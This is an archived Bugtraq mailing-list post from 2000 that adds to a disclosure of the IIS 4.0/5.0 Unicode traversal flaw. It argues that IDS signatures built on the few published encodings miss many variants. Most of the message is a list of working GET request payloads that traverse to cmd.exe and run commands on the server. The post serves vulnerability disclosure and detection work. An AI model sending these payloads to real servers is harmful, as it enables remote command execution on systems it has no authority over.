Bugtraq mailing list archives
[LoWNOISE] addendum %c1%1c IIS 4.0/5.0 Remote command execution
From: ET LoWNOISE <et () CYBERSPACE ORG>
Date: Fri, 20 Oct 2000 03:30:48 -0400
Hola, Just a quick note to add. Too many people are now just creating new signatures on their IDS to "protect" their servers based on the recents advisories where appears only exploit information with: %c1%1c %c0%af %c1%9c Is just a misunderstanding there are too many ways to exploit this bug..doing a quick search : GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir (C-1-PC) this is just in the range c0 00 to c2 00...! Efrain 'ET' Torres [LoWNOISE] Colombia et () cyberspace org
Current thread:
- IIS %c1%1c remote command execution rain forest puppy (Oct 17)
- Re: IIS %c1%1c remote command execution Florian Weimer (Oct 18)
- Re: IIS %c1%1c remote command execution rain forest puppy (Oct 19)
- [LoWNOISE] addendum %c1%1c IIS 4.0/5.0 Remote command execution ET LoWNOISE (Oct 20)
- Re: IIS %c1%1c remote command execution rain forest puppy (Oct 19)
- <Possible follow-ups>
- Re: IIS %c1%1c remote command execution Nsfocus Security Team (Oct 18)
- Re: IIS %c1%1c remote command execution Cris Bailiff (Oct 19)
- Re: IIS %c1%1c remote command execution Florian Weimer (Oct 18)